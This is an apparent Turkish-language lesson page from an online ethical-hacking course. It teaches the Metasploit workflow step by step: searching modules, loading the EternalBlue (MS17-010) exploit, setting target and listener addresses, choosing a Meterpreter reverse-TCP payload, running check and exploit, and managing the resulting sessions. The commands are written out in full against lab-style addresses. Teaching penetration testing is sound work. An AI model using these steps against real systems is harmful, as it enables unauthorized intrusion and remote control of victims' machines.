0Pricing
Ethical Hacking Academy · Ders

İstismarları Arama ve Kullanma

Bulun ve çalıştırın

İstismarları Arama ve Kullanma, CoddyKit'te ücretsiz bir Ethical Hacking Academy dersidir. Bu, 4 dersinin 2. dersidir. Aşağıdan dersin tamamını ücretsiz okuyabilir, sonra tarayıcıda yerleşik kod editörü ve 7/24 yapay zeka koçu ile uygulamalı olarak pratik yapabilirsin. Bu, Ethical Hacking Academy öğrenme yolunun bir parçasıdır ve ilerlemeniz web ve CoddyKit uygulaması arasında senkronize olur. Ethical Hacking Academy kursu toplamda 4 dersten oluşur.

Keşiften İstismara

Tarama sonrasında hedefin hizmetlerini ve sürümlerini bilirsiniz. Sıradaki adım, bu sürümlerdeki bilinen bir güvenlik açığıyla eşleşen bir istismar modülü bulmaktır.

Metasploit'in search komutu, binlerce modüle açılan kapınızdır. Hassas arama yapmak zamandan kazandırır ve yanlış kodu çalıştırmanızı önler.

Temel Arama

search komutu, modül dizinini anahtar kelimeye göre sorgular. Yazılım adına, CVE'ye veya hizmete göre arama yapabilirsiniz.

search eternalblue
search type:exploit platform:windows smb

Arama Süzgeçleri

Sonuçları şu süzgeçlerle daraltın:

  • type: exploit, auxiliary, post.
  • platform: windows, linux, unix.
  • cve: belirli bir CVE tanımlayıcısı.
  • rank: excellent, great, good (güvenilirlik).

Süzgeçleri birleştirmek, binlerce modülü hızla bir avuç seçeneğe indirir.

search cve:2017-0144 type:exploit

Arama Çıktısını Okuma

Arama sonuçları her modülü bir rank, bir ifşa tarihi ve bir check göstergesiyle listeler. Sıralama, istismarın güvenilirliğini ve güvenliğini yansıtır.

  • excellent: hedefin çökmesine neden olma olasılığı düşüktür.
  • great/good: yaygın koşullarda güvenilirdir.
  • low/manual: risklidir veya dikkatli bir kurulum gerektirir.

Üretim sistemlerinin çökmesini önlemek için daha yüksek sıralamalı modülleri tercih edin.

Modül Yükleme

use komutuyla modülün dizin numarasını veya tam yolunu kullanın. İstem, yüklenen modülü gösterecek şekilde değişir ve veri deposu artık bu modülün seçeneklerini içerir.

use exploit/windows/smb/ms17_010_eternalblue
# msf6 exploit(windows/smb/ms17_010_eternalblue) >

Modülü İnceleme

Çalıştırmadan önce modül hakkında bilgi edinin. info; açıklamayı, referansları (CVE'ler, uyarılar), gerekli seçenekleri ve desteklenen hedefleri gösterir.

Bir modülün ne yaptığını anlamak, profesyonel ve sorumlu kullanımın bir parçasıdır; anlamadığınız bir istismarı asla çalıştırmayın.

info
show options
show targets

Seçenekleri Ayarlama

Gerekli seçenekleri set komutuyla yapılandırın. Uzaktan gerçekleştirilen bir istismar için yaygın seçenekler hedef adresi ve yük ayarlarınızdır.

set RHOSTS 10.10.10.40
set RPORT 445
set LHOST 10.10.14.2

check Komutu

Birçok istismar, hedefin gerçekten istismara açık görünüp görünmediğini gerçekten istismar etmeden güvenli bir şekilde test eden check komutunu destekler.

Önce check komutunu çalıştırmak iyi bir uygulamadır: bir sistemin çökme riskini azaltır ve çabanızı gerçek bir fırsata harcamak üzere olduğunuzu doğrular.

check
# [+] 10.10.10.40:445 - The target is vulnerable.

Yükü Seçme

Bir istismarın yüke ihtiyacı vardır. Metasploit varsayılan bir yük seçer, ancak hedefe ve erişim ihtiyaçlarınıza uygun bir yükü listeleyip seçebilirsiniz.

show payloads
set PAYLOAD windows/x64/meterpreter/reverse_tcp

Çalıştırma ve Oturumlar

exploit (veya run) komutuyla başlatın. Başarılı olursa hedefe etkileşimli bir bağlantı olan bir oturum elde edersiniz.

Birden çok oturumu listelemek için sessions -l, etkileşim kurmak için sessions -i N kullanın. Konsolda çalışmaya devam etmek için background komutuyla bir oturumu arka plana alın.

exploit
sessions -l
sessions -i 1

Genel Seçenekler ve Modül Seçenekleri

LHOST gibi bazı ayarlar birçok modülde yeniden kullanılır. Modüller arasında her geçişte bunları yeniden yazmamak için setg ile genel olarak ayarlayın.

  • set: yalnızca geçerli modüle uygulanır.
  • setg: modüller genelinde uygulanır.
  • unsetg: genel bir değeri temizler.

Bu, çok sayıda modül içeren uzun süreli çalışmalar sırasında zaman kazandırır.

setg LHOST 10.10.14.2
setg RHOSTS 10.10.10.40

Hızlı Kontrol

Bir istismarı çalıştırmadan önce sorumlu adımı seçin.

Özet

İstismarları bulmayı ve çalıştırmayı öğrendiniz:

  • Modülleri bulmak için filtrelerle (tür, platform, cve, rank) search kullanın.
  • Güvenilirlik ve güvenlik için daha yüksek rank değerine sahip modülleri tercih edin.
  • Yüklemek için use, incelemek için info/show options, yapılandırmak için set kullanın.
  • Önce check, ardından bir oturum elde etmek için exploit çalıştırın.
  • Oturumları sessions -l/-i ile yönetin.

Sırada: yükler ve istismar sonrası Meterpreter kabuğu.

Sıkça Sorulan Sorular

“İstismarları Arama ve Kullanma” dersi ücretsiz mi?

Evet — “İstismarları Arama ve Kullanma” dersin tüm metni burada web'de ücretsiz olarak okunabilir. Etkileşimli olarak pratik yapmak (yerleşik kod editörü ve 7/24 yapay zeka koçu) ve Ethical Hacking Academy kursunun geri kalanını açmak için CoddyKit PRO'ya yükselt. Ethical Hacking Academy kursu toplamda 4 dersten oluşur.

“İstismarları Arama ve Kullanma” dersinde ne öğreneceğim?

Bulun ve çalıştırın Ethical Hacking Academy ile uygulamalı kodu tarayıcıda doğrudan çalıştırarak pratik yaparsın ve 7/24 yapay zeka koçu dersi çalışırken sorularını yanıtlar.

Ethical Hacking Academy öğrenmeye başlamak için deneyim gerekli mi?

Önceden deneyim gerekmez. CoddyKit'te Ethical Hacking Academy, başlangıçtan ileri seviyeye kadar yapılandırıldığı için buradan başlayabilir veya başından başlayıp kendi hızında ilerleme yapabilirsin. Bu, 4 dersinin 2. dersidir.

“İstismarları Arama ve Kullanma” dersi ne kadar sürer?

Çoğu CoddyKit dersi yaklaşık 5–10 dakika sürer. Her biri kısa ve etkileşimli olduğu için sabit ilerleme yaparsın ve web ile uygulama arasında tam olarak bıraktığın yerden devam edebilirsin.

Bu Ethical Hacking Academy dersinde kod yazıp çalıştırabilir miyim?

Evet. Her Ethical Hacking Academy dersi yerleşik bir kod editörü içerir, bu sayede tarayıcıda gerçek kod yazıp çalıştırabilir ve anlık yapay zeka geri bildirimi alırsın — yerel kurulum gerekli değildir.

Bu kursun tüm dersleri

  1. Metasploit Mimarisi
  2. İstismarları Arama ve Kullanma
  3. Yükler ve Meterpreter
  4. İstismar Sonrası Modüller
← Ethical Hacking Academy Sayfasına Dön